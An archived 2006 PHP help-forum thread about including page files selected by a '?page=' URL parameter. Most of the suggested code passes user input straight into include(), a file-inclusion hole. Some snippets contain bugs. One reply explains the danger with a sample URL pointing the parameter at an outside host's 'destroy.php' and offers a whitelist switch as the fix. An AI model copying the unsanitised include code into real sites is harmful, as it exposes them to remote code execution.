include file from url query

mccabre1 · February 16, 2006

Hi, I'm trying to include files in my 'index.php' page based on the url. My menu links to:

index.php?page=home
index.php?page=news
index.php?page=contact

then I want to include the content based on that url, so if it reads 'index.php?page=home' it will load 'home.php'.

I currently have this line of code to call the file:
[code]
<? include ("$page.php"); ?>
[/code]

Now, when I load my page it can't find the file and doesn't recognise the 'page=' bit of the url.

Can anyone tell me what I'm doing wrong??

Thanks.
C

Darkness Soul · February 16, 2006

May it works, i don't test ;)

[code]<?php
$page = $_GET['page'];
include $page;
?>[/code]

^~ if works, tell me, if wont, tell me too, so then i will test here and get the code..

bye

mccabre1 · February 16, 2006

[!--quoteo(post=346437:date=Feb 16 2006, 05:26 PM:name=Darkness Soul)--][div class=\'quotetop\']QUOTE(Darkness Soul @ Feb 16 2006, 05:26 PM) [snapback]346437[/snapback][/div][div class=\'quotemain\'][!--quotec--]
May it works, i don't test ;)

[code]<?php
$page = $_GET['page'];
include $page;
?>[/code]

^~ if works, tell me, if wont, tell me too, so then i will test here and get the code..

bye
[/quote]

Yes! That's fantastic, thanks very much! I wrote the code out as follows:

[code]
<?
$page = $_GET['$page'];
include ("$page.php");
?>
[/code]

- '.php' is the file extension on my includes.

Thanks again,
Chris

mccabre1 · February 17, 2006

Also, when using the $page on many different things - such as specifying the page 'title', just put the following above your doctype:

[code]
<? $page = $_GET['page']; ?>
[/code]

Thanks again!

Chris

Darkness Soul · February 17, 2006

Yep, that's the cool side of the for.. code!

You aways can use it for all pages with one code.. something like..

[code]<?php

   // Before headers
   $page = $_GET [ '$page' ];

   // Now, test the URL query for security {thanks another topic}
   if ( !is_file ( "$page.php" ) && $page != "" )
   {
      // File not found!!!
      header ( "location: index.php" );
   }
   // Are you in index?
   elseif ( $page == "" )
   {
      $page = "home";
   }

   // Inside <title></title> tags
   print "You are in ". $page";

   // Calling the specific page
   include ( "$page.php" );

   // (...)
?>[/code]

=)

dude753 · February 20, 2006

Howdy,

I found this code on a search. I used it and it worked. I just changed the "s to 's and it stopped working. I was just wondering why?

It causes no problem I'll just use "s instead.

[code]include ("$page.php");[/code]

Darkness Soul · February 21, 2006

If am I wrong, please tell me.. but, i think..

When you use " ", the PHP allow you to write variables inside, when you use ' ', you are not allowed to.

Like your include, test both of these:
[code]
// may work
require ( "$page.php" );
require ( $page .'.php' );

// may not work
require ( '$page' . '.php' );
require ( '$page.php' ); [/code]
=)

heckenschutze · February 21, 2006

One very large problem with the code mentioned, is remote script execution is possible.

Eg if I made a script on my site that destroyed everything if run, I could tell your script to run/include it.

The following would work:

index.php?page=http://mysite.com/destroy[!--coloro:#CCCCCC--][span style=\"color:#CCCCCC\"][!--/coloro--][i].php[/i][!--colorc--][/span][!--/colorc--]

Therefore, causing destroy.php to be included into your page, as if it was a file on your site.

A common work around is to use switches:
[code]<?php

switch($_GET["page"])
{
    case "page1";
        $page = "page1.php";
        $title = "My page title.php";
    break;

    default:
        $page = "main.php";
        $title = "Home";
    break;
}

include $page;

?>[/code]

hth someone.

dude753 · February 26, 2006

[!--quoteo(post=347945:date=Feb 21 2006, 01:28 PM:name=heckenschutze)--][div class=\'quotetop\']QUOTE(heckenschutze @ Feb 21 2006, 01:28 PM) [snapback]347945[/snapback][/div][div class=\'quotemain\'][!--quotec--]
One very large problem with the code mentioned, is remote script execution is possible.

Eg if I made a script on my site that destroyed everything if run, I could tell your script to run/include it.

The following would work:

index.php?page=http://mysite.com/destroy[!--coloro:#CCCCCC--][span style=\"color:#CCCCCC\"][!--/coloro--][i].php[/i][!--colorc--][/span][!--/colorc--]

Therefore, causing destroy.php to be included into your page, as if it was a file on your site.

A common work around is to use switches:
[code]<?php

switch($_GET["page"])
{
    case "page1";
        $page = "page1.php";
        $title = "My page title.php";
    break;

    default:
        $page = "main.php";
        $title = "Home";
    break;
}

include $page;

?>[/code]

hth someone.
[/quote]
Could I also stick my site URL infront of the $page value? So that if someone tried to put their own URL in it would be [a href=\"http://mydomain.com/index.php?page=http://theirsite.com/destroy\" target=\"_blank\"]http://mydomain.com/index.php?page=http://...ite.com/destroy[/a]

Then $page would equal [a href=\"http://mydomain.com/http://theirsite.com/destroy\" target=\"_blank\"]http://mydomain.com/http://theirsite.com/destroy[/a] and this would give a 404.

Sign In

include file from url query

Recommended Posts

mccabre1

Link to comment

Share on other sites

Darkness Soul

Link to comment

Share on other sites

mccabre1

Link to comment

Share on other sites

mccabre1

Link to comment

Share on other sites

Darkness Soul

Link to comment

Share on other sites

dude753

Link to comment

Share on other sites

Darkness Soul

Link to comment

Share on other sites

heckenschutze

Link to comment

Share on other sites

dude753

Link to comment

Share on other sites

Archived

Browse

Activity

Important Information